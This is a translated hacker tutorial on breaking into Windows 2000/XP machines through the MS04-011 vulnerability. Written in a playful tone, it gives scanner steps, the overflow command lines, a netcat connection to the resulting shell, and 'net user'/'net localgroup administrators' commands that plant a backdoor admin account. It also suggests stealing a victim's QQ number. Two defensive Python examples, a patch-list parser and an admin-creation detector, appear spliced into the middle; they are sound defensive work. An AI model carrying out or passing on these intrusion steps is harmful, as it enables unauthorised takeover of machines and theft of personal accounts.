Oh, everyone should know this vulnerability, haha, it is such a good one. Hackers use it to get Administrators privileges on the operating system and then a shell on the machine. Not much else to say; let's look at how machines get broken into this way.
1. First, go and download an MS04011 exploit (overflow tool); there are plenty online.
The tools are DSSCAN, Getos and the MS04011 overflow tool.
DSSCAN: a scanner that checks whether a host has the MS04011 vulnerability. When it scans the target machines it lists each one's IP address, host name, NetBIOS name and, most importantly, its status. It scans all the live hosts in the IP range; a machine with the MS04011 vulnerability shows Vulnerable in the status column, otherwise Not Vulnerable. It usually scans 64 IP addresses at a time.
Getos: used to find out the operating system type, but the target machine must have port 139 open.
MS04011: the tool that performs the overflow.
2. How to overflow
First run DSSCAN, enter the IP in the IP box, then right-click so it moves into the box on the right, where you can select it. Then click Start. For example, suppose we scan and get a result like this:
IP             hostname   netbios   status
192.168.1.33   you        you       Vulnerable
192.168.1.34   Haha       Haha      Not Vulnerable
You can see that the status of 192.168.1.33 is Vulnerable, which means it has the MS04011 vulnerability.
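From the defender's side, the same scan output is what you would feed into a patch list for your own network. Here is an added example (not DSSCAN's code or the post's own) that parses result lines in the four-column layout shown above and returns the hosts that still need the MS04-011 patch. The rows beyond the two from the post are constructed; the point worth noticing is that the status column can be two words ("Not Vulnerable"), so a naive whitespace split of a fixed column count gets it wrong.

```python
"""Turn DSSCAN-style scan output into a patch list (added example, not DSSCAN's code)."""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List

# Constructed sample in the layout the post shows: IP, hostname, NetBIOS name, status.
# Only the first two data rows come from the post; the rest are made up for the example.
SAMPLE_OUTPUT = """\
IP hostname netbios status
192.168.1.33 you you Vulnerable
192.168.1.34 Haha Haha Not Vulnerable
192.168.1.35 fileserv FILESERV Vulnerable
192.168.1.36 - - Not Vulnerable
"""


@dataclass(frozen=True)
class ScanRow:
    ip: str
    hostname: str
    netbios: str
    vulnerable: bool


def parse_dsscan(text: str) -> List[ScanRow]:
    """Parse scanner output; the status may span two words, so join everything after column 3."""
    rows: List[ScanRow] = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].lower() == "ip":
            continue  # blank line or the header row
        if len(parts) < 4:
            continue  # truncated line, ignore rather than guess
        ip, hostname, netbios = parts[:3]
        status = " ".join(parts[3:]).lower()
        if status == "vulnerable":
            vulnerable = True
        elif status == "not vulnerable":
            vulnerable = False
        else:
            continue  # unknown status text (e.g. host did not answer)
        rows.append(ScanRow(ip, hostname, netbios, vulnerable))
    return rows


def hosts_needing_patch(rows: Iterable[ScanRow]) -> List[str]:
    """IPs flagged Vulnerable, sorted numerically (not lexically) for a clean work list."""
    return sorted((r.ip for r in rows if r.vulnerable), key=ipaddress.ip_address)


if __name__ == "__main__":
    for ip in hosts_needing_patch(parse_dsscan(SAMPLE_OUTPUT)):
        print("needs MS04-011 patch:", ip)
```

Unknown status strings are skipped on purpose: a host that did not answer is not "not vulnerable", and silently treating it as safe would hide it from the patch list.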
Now let's overflow it. Before starting the overflow, first find out the other machine's operating system type with Getos.
Open CMD, go to the directory where your program is, and enter Getos 192.168.1.33
The result will look like this:
[*] Connecting Port 139 ... ..
[*] Sending session request ... ..
[*] Sending Negotiation Request ....
Sending Setup Account Request ....
[*] Successful ...
REMOTE OS:
-------------
Workgroup // this is the workgroup name
Windows 2000 Lan Manger
Windows 5.0 // this is the operating system type; Windows 5.1 would be XP
OK, we know it is Windows 2000, so now we use MS04011 to overflow it.
First open two CMD windows and enter MS04011 0 192.168.1.33 in both at the same time; then one of the two CMD windows will show:
Shellcode Size 404
RET VALUE = 1726 // Note: 1726 means the overflow succeeded
For XP systems use MS04011 1 192.168.1.33 instead.
3. How to get the machine's shell
Use the most powerful Swiss army knife (it is called NC), haha; this tool is nothing rare, go and find it online.
Then enter NC 192.168.1.33 1234 in CMD; 1234 is the port opened by the overflow. Haha, doesn't a prompt like this appear?
C:\Winnt\System32>
// Haha, you have succeeded. Now you can do whatever you like.
For example:
net user haha 123 /add // creates a user haha with password 123 on the machine
net localgroup administrators haha /add // puts haha into the Administrators group
Of course, you can also go into the Tencent program directory and take an MM's QQ number to contact her later.
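The two commands above are exactly the post-exploitation pattern a defender should alert on: a local account is created and, seconds later, added to Administrators on the same host. Here is an added example (mine, not from the post) of that detection run over constructed process command-line audit records. The flat "time host parent command" format is made up for the example and is not a real Windows event layout; in practice the same regexes would be applied to whatever process-creation telemetry you collect. The logic is slightly more general than the post's case: the password argument is optional, account names are matched case-insensitively, and a bare "net localgroup administrators ... /add" without a preceding account creation is still reported at a lower severity.

```python
"""Flag local-account creation followed by Administrators membership (added example)."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterator, List, Tuple

# Constructed audit records: "<ISO time> <host> <parent process> <command line>".
# Made-up flat format for this example; host names and times are constructed.
SAMPLE_LOG = """\
2004-05-02T03:14:07 WS33 cmd.exe net user haha 123 /add
2004-05-02T03:14:12 WS33 cmd.exe net localgroup administrators haha /add
2004-05-02T09:00:01 WS34 explorer.exe notepad.exe report.txt
2004-05-02T09:30:44 WS34 cmd.exe net user /domain
2004-05-02T10:02:10 WS35 cmd.exe net localgroup administrators svc_backup /add
"""

# "net user <name> [<password>] /add"; the password token is optional.
NET_USER_ADD = re.compile(r"^net\s+user\s+(\S+)(?:\s+\S+)?\s+/add\b", re.IGNORECASE)
# "net localgroup administrators <name> /add"
NET_LOCALGROUP_ADMIN_ADD = re.compile(
    r"^net\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.IGNORECASE
)


@dataclass(frozen=True)
class Finding:
    host: str
    account: str
    severity: str
    reason: str


def parse_log(text: str) -> Iterator[Tuple[datetime, str, str, str]]:
    """Split each constructed record into (timestamp, host, parent, command line)."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, cmd = line.split(" ", 3)
        yield datetime.fromisoformat(ts), host, parent, cmd


def detect_local_admin_creation(
    text: str, window: timedelta = timedelta(minutes=10)
) -> List[Finding]:
    """Correlate `net user ... /add` with a later `net localgroup administrators ... /add`."""
    # (host, account) -> time the account was created via `net user ... /add`
    recent_adds: Dict[Tuple[str, str], datetime] = {}
    findings: List[Finding] = []
    for ts, host, _parent, cmd in parse_log(text):
        m = NET_USER_ADD.match(cmd)
        if m:
            recent_adds[(host, m.group(1).lower())] = ts
            continue
        m = NET_LOCALGROUP_ADMIN_ADD.match(cmd)
        if not m:
            continue
        account = m.group(1).lower()
        created = recent_adds.get((host, account))
        if created is not None and ts - created <= window:
            delta = int((ts - created).total_seconds())
            findings.append(Finding(host, account, "high",
                                    f"account created and added to Administrators {delta}s later"))
        else:
            findings.append(Finding(host, account, "medium",
                                    "existing account added to Administrators"))
    return findings


if __name__ == "__main__":
    for f in detect_local_admin_creation(SAMPLE_LOG):
        print(f"[{f.severity}] {f.host}: {f.account}: {f.reason}")
```

The correlation key is (host, account), so a legitimate admin adding an old service account on one machine does not inherit the "high" severity from an unrelated account creation elsewhere; the ten-minute window is an assumption you would tune to your environment.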
Serious statement: do not use this method for anything illegal; if you do, the consequences are your own responsibility. This article is published so that you pay attention to your own system's security and patch often. There are a lot of machines in the country with this hole, hehe!!!!!